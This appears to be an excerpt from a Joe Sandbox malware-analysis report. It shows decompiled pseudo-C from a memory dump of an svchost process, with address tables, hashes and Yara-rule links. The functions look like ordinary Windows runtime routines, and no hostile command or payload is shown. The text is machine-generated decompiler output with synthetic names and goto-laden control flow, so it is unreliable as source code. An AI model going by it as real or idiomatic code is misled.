                        0x0305a6a0
                        0x0305a6ad
                        0x0305a6af
                        0x0305a6b4
                        0x03099ba7
                        0x03099bac
                        0x00000000
                        0x00000000
                        0x03099bc6
                        0x03099bce
                        0x03099bd1
                        0x03099bd3
                        0x03099bd3
                        0x00000000
                        0x03099bd1
                        0x0305a6bd
                        0x0305a6c3
                        0x0305a6c6
                        0x0305a6d2
                        0x0305a701
                        0x0305a704
                        0x00000000
                        0x0305a704
                        0x0305a6d4
                        0x0305a6d6
                        0x0305a6d9
                        0x0305a6db
                        0x0305a6e1
                        0x0305a6e6
                        0x0305a6e8
                        0x0305a6e8
                        0x0305a6ea
                        0x00000000
                        0x0305a6ea
                        0x0305a688
                        0x0305a692
                        0x0305a694
                        0x0305a699
                        0x00000000
                        0x00000000
                        0x0305a69d
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 26635bebb88e9d45fb4125a86d40d506aff2fc8aebd558e5746dde18e75dabd2
                        • Instruction ID: c75f076cfe6a913a76f90fb6a71573f9a1391651a683ecc89e1b15a3bb36182b
                        • Opcode Fuzzy Hash: 26635bebb88e9d45fb4125a86d40d506aff2fc8aebd558e5746dde18e75dabd2
                        • Instruction Fuzzy Hash: 1D415CB5A02209DFDB05CF58D990B9EB7F5BF89300F1981AAE804AF384C774A941CF64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03063D43 Relevance: .1, Instructions: 106COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E03063D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E03037B60(0, _t61, 0x30011c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E03037B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L03044620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                        0x03063d4c
                        0x03063d50
                        0x03063d55
                        0x03063d5e
                        0x0309e79a
                        0x00000000
                        0x0309e79a
                        0x03063d68
                        0x0309e789
                        0x03063d9d
                        0x03063da3
                        0x03063daf
                        0x03063db5
                        0x03063dbc
                        0x03063dc4
                        0x03063dc9
                        0x03063dce
                        0x0309e7ae
                        0x0309e7ae
                        0x03063dde
                        0x03063de2
                        0x03063de7
                        0x03063e0d
                        0x03063e13
                        0x03063e16
                        0x03063e1e
                        0x03063e25
                        0x03063e28
                        0x00000000
                        0x00000000
                        0x03063e2a
                        0x03063e2f
                        0x03063e37
                        0x03063e37
                        0x00000000
                        0x03063e37
                        0x03063e31
                        0x00000000
                        0x03063e31
                        0x03063e20
                        0x03063e20
                        0x03063e35
                        0x00000000
                        0x03063de9
                        0x03063de9
                        0x03063de9
                        0x03063dee
                        0x03063dfd
                        0x03063dff
                        0x03063e02
                        0x03063e05
                        0x03063e05
                        0x00000000
                        0x03063df0
                        0x03063de7
                        0x0309e78f
                        0x0309e794
                        0x03063d79
                        0x03063d84
                        0x03063d89
                        0x03063d8e
                        0x00000000
                        0x0309e7a4
                        0x03063d96
                        0x03063d9a
                        0x00000000
                        0x03063d9a
                        0x00000000
                        0x0309e794
                        0x03063d6e
                        0x03063d73
                        0x00000000
                        0x0309e7b5
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8e321f79e77b939d1e2d4abf7af55d8d57112acdae85c2f28ecc93b766c15d7
                        • Instruction ID: cda5480695da77d2b86c37e21556028288915c587634312a2b9a07dbcda8cb11
                        • Opcode Fuzzy Hash: e8e321f79e77b939d1e2d4abf7af55d8d57112acdae85c2f28ecc93b766c15d7
                        • Instruction Fuzzy Hash: 90319279606615DBD724CF29D841A6FBBF5EF4570070984AEE446CB3A5E730D840C7E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0304C182 Relevance: .1, Instructions: 104COMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E0304C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E03047D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E030F8D34(_v8, _t80);
					}
					E03042280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0303FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E030F8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0303FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0306B180();
						if(_a4 != 0) {
							E03042280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0304BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0304BB2D(_t16, _t15);
						E0304B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0303FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0303FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0303FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                        0x0304c18d
                        0x0304c18f
                        0x0304c191
                        0x0304c19b
                        0x0304c1a0
                        0x0304c1d4
                        0x0304c1de
                        0x03092d6e
                        0x0304c1e4
                        0x0304c1e4
                        0x0304c1e4
                        0x0304c1ec
                        0x03092d7d
                        0x03092d7d
                        0x0304c1f3
                        0x0304c1ff
                        0x03092d88
                        0x03092d8d
                        0x03092d94
                        0x03092d94
                        0x03092d9f
                        0x03092da4
                        0x03092dab
                        0x03092db0
                        0x03092db2
                        0x03092db3
                        0x03092db4
                        0x03092dbc
                        0x03092dc3
                        0x03092dc3
                        0x0304c205
                        0x0304c205
                        0x0304c208
                        0x0304c20e
                        0x0304c211
                        0x0304c216
                        0x0304c219
                        0x0304c21f
                        0x0304c222
                        0x0304c22c
                        0x0304c234
                        0x0304c23a
                        0x0304c23f
                        0x0304c245
                        0x0304c24b
                        0x0304c251
                        0x0304c25a
                        0x0304c276
                        0x0304c27d
                        0x0304c27d
                        0x0304c25c
                        0x0304c25c
                        0x00000000
                        0x0304c25e
                        0x0304c1a4
                        0x0304c1aa
                        0x0304c1b3
                        0x0304c265
                        0x0304c26c
                        0x0304c26c
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction ID: 1005e45894525c992b4ab7f69484a19224aaeb806ccbcf77b40de0e4173f4f1d
                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction Fuzzy Hash: DA3128B5B0764ABFE744EBB4C480BE9F798BF82204F08456AD41C8B211DB74AB45D7E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030A7016 Relevance: .1, Instructions: 104COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E030A7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x311d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E030A6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E030A6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E03047D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03069AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0306B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L03044620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                        0x030a7016
                        0x030a701e
                        0x030a702b
                        0x030a7033
                        0x030a7037
                        0x030a703c
                        0x030a703e
                        0x030a7041
                        0x030a7045
                        0x030a704a
                        0x030a7050
                        0x030a7055
                        0x030a705a
                        0x030a7062
                        0x030a7062
                        0x030a705a
                        0x030a7064
                        0x030a7064
                        0x030a7067
                        0x030a7071
                        0x030a7096
                        0x030a709b
                        0x030a70a2
                        0x030a70a6
                        0x030a70a7
                        0x030a70ad
                        0x030a70b3
                        0x030a70b6
                        0x030a70bb
                        0x030a70c3
                        0x030a70c3
                        0x030a70c6
                        0x030a70cd
                        0x030a70dd
                        0x030a70e0
                        0x030a70e2
                        0x030a70e2
                        0x030a70ee
                        0x030a7101
                        0x030a70f0
                        0x030a70f9
                        0x030a70f9
                        0x030a710a
                        0x030a710e
                        0x030a7112
                        0x030a7117
                        0x030a7118
                        0x030a7118
                        0x030a70bb
                        0x030a711d
                        0x030a7123
                        0x030a7131
                        0x030a7131
                        0x030a7136
                        0x030a713d
                        0x030a713e
                        0x030a713f
                        0x030a714a
                        0x030a714a
                        0x030a7084
                        0x030a7088
                        0x00000000
                        0x030a708e
                        0x030a708e
                        0x030a7092
                        0x00000000
                        0x030a7092

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 587357eac669dc54d6384a89859c36fa3cd79a6751898860672b1f29a887ad9d
                        • Instruction ID: e3ad7c09f144fb7d63851bbfe9f79a551ef83388ecf357ca9199a9082448786b
                        • Opcode Fuzzy Hash: 587357eac669dc54d6384a89859c36fa3cd79a6751898860672b1f29a887ad9d
                        • Instruction Fuzzy Hash: 7F31A876605B519BC310DFACD950EAAB7F5BFC8B00F088A2DF9558B690E730E904C7A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030D3D40 Relevance: .1, Instructions: 98COMMON
                        Download Yara Rule
                        C-Code - Quality: 70%
                        			E030D3D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x311d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E03042280(_t34, 0x3118a6c);
				_t64 =  *0x3115768; // 0x77495768
				if(_t64 != 0x3115768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77495770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E0303FFB0(_t53, _t64, 0x3118a6c);
						 *0x311b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E03042280(_t45, 0x3118a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x3115768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E0303FFB0(_t51, _t64, 0x3118a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0306B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                        0x030d3d40
                        0x030d3d48
                        0x030d3d52
                        0x030d3d59
                        0x030d3d5d
                        0x030d3d61
                        0x030d3d63
                        0x030d3d67
                        0x030d3d69
                        0x030d3d72
                        0x030d3d76
                        0x030d3d7a
                        0x030d3d7f
                        0x030d3d8b
                        0x030d3d91
                        0x030d3d91
                        0x030d3d91
                        0x030d3d94
                        0x030d3d96
                        0x030d3d9d
                        0x030d3da1
                        0x030d3db0
                        0x030d3dba
                        0x030d3dbc
                        0x030d3dbc
                        0x030d3dc6
                        0x030d3dcb
                        0x030d3dcf
                        0x030d3dd1
                        0x030d3dd4
                        0x00000000
                        0x00000000
                        0x030d3dd9
                        0x030d3e0c
                        0x030d3e0c
                        0x030d3e0f
                        0x030d3ddb
                        0x030d3ddb
                        0x030d3de0
                        0x00000000
                        0x030d3de2
                        0x030d3de2
                        0x030d3de4
                        0x030d3de8
                        0x030d3deb
                        0x030d3df1
                        0x00000000
                        0x030d3df3
                        0x030d3df3
                        0x030d3df5
                        0x030d3df8
                        0x030d3dfa
                        0x00000000
                        0x030d3dfa
                        0x030d3df1
                        0x030d3de0
                        0x030d3e11
                        0x030d3e11
                        0x00000000
                        0x030d3dfe
                        0x030d3e04
                        0x030d3e06
                        0x00000000
                        0x030d3e06
                        0x00000000
                        0x030d3e04
                        0x030d3d91
                        0x030d3e15
                        0x030d3e1a
                        0x030d3e1f
                        0x030d3e1f
                        0x030d3e23
                        0x030d3e29
                        0x00000000
                        0x00000000
                        0x030d3e2e
                        0x00000000
                        0x030d3e30
                        0x030d3e30
                        0x030d3e35
                        0x00000000
                        0x030d3e37
                        0x030d3e3e
                        0x030d3e42
                        0x030d3e48
                        0x030d3e4e
                        0x00000000
                        0x030d3e4e
                        0x030d3e35
                        0x00000000
                        0x030d3e2e
                        0x030d3e5b
                        0x030d3e5c
                        0x030d3e5d
                        0x030d3e68
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2121b561feaa3316c3dd41d39e719ed41635aaf2275d3c22fae74b0b5c4ea6ba
                        • Instruction ID: 8653b99eed2ec021741a8452c6830870709896c63afcf187f0b5212b460c53fd
                        • Opcode Fuzzy Hash: 2121b561feaa3316c3dd41d39e719ed41635aaf2275d3c22fae74b0b5c4ea6ba
                        • Instruction Fuzzy Hash: B5318CB5A0A302DFC714DF14D58059ABBE5FFC9604F4889AEF4989B291D730DE04CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305A70E Relevance: .1, Instructions: 96COMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E0305A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x3117b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x3117b10 = 8;
					 *0x3117b14 = 0x3117b0c;
					 *0x3117b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0305A990(0x3117b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0305A840(__edx, __ecx, __ecx, _t52, 0x3117b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x3117b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x3117b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x3117b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L03044620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x3117b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0306F3E0(_t50,  *0x3117b14, _t8 >> 3);
						_t28 =  *0x3117b14; // 0x0
						__eflags = _t28 - 0x3117b0c;
						if(_t28 != 0x3117b0c) {
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x3117b14 = _t50;
						_t48 = _v12;
						 *0x3117b10 = _t9;
						goto L6;
					}
					 *0x3117b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                        0x0305a713
                        0x0305a714
                        0x0305a717
                        0x0305a71d
                        0x0305a720
                        0x0305a722
                        0x0305a727
                        0x0305a74a
                        0x0305a754
                        0x0305a75e
                        0x0305a768
                        0x0305a76a
                        0x0305a773
                        0x0305a78b
                        0x0305a790
                        0x0305a792
                        0x0305a741
                        0x0305a741
                        0x0305a743
                        0x0305a749
                        0x0305a749
                        0x0305a732
                        0x0305a73a
                        0x0305a797
                        0x0305a79d
                        0x0305a7a3
                        0x0305a7a9
                        0x0305a7b6
                        0x0305a7bc
                        0x0305a7ca
                        0x0305a7e0
                        0x0305a7e2
                        0x0305a7e4
                        0x03099bf2
                        0x00000000
                        0x03099bf2
                        0x0305a7ed
                        0x0305a7f2
                        0x0305a800
                        0x0305a805
                        0x0305a80d
                        0x0305a812
                        0x03099c08
                        0x03099c08
                        0x0305a818
                        0x0305a81b
                        0x0305a821
                        0x0305a824
                        0x00000000
                        0x0305a824
                        0x0305a7ae
                        0x00000000
                        0x0305a7ae
                        0x0305a73c
                        0x0305a73e
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a7ecfbf138f7e6e70eebf4cab5ff36068ae1ebf4d6063348e2122e82885a935
                        • Instruction ID: 4457d3fbdf719ded397e2d0ad79e6d3dd50476812d1650d0c1b38a06b9747aaf
                        • Opcode Fuzzy Hash: 6a7ecfbf138f7e6e70eebf4cab5ff36068ae1ebf4d6063348e2122e82885a935
                        • Instruction Fuzzy Hash: F131A1B17012059FC716EB18FE80FABBBF9FB88710F140A6AE41597384D7749981CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0302AA16 Relevance: .1, Instructions: 93COMMON
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E0302AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x311d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x3117b9c; // 0x0
					_t53 = L03044620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0306B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0306F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L03036C59(_t53, _t51, _t58) != 0) {
							_t28 = E03055E50(0x300c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0305B230(_v32, _v28, 0x300c2d8, 1,  &_v24);
								_t28 = E0302F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                        0x0302aa25
                        0x0302aa29
                        0x0302aa2d
                        0x0302aa30
                        0x0302aa37
                        0x0302aa3c
                        0x03084458
                        0x03084458
                        0x03084472
                        0x03084474
                        0x03084476
                        0x0302aa64
                        0x0302aa74
                        0x0308447c
                        0x03084483
                        0x03084492
                        0x0302aa52
                        0x0302aa54
                        0x0302aa5e
                        0x030844a8
                        0x030844ad
                        0x030844af
                        0x030844b6
                        0x030844b6
                        0x030844b9
                        0x030844bc
                        0x030844cd
                        0x030844d3
                        0x030844d6
                        0x030844e1
                        0x030844e1
                        0x030844e6
                        0x030844e8
                        0x030844fb
                        0x030844fb
                        0x030844e8
                        0x00000000
                        0x0302aa5e
                        0x03084476
                        0x0302aa42
                        0x0302aa46
                        0x0302aa48
                        0x0302aa4c
                        0x00000000
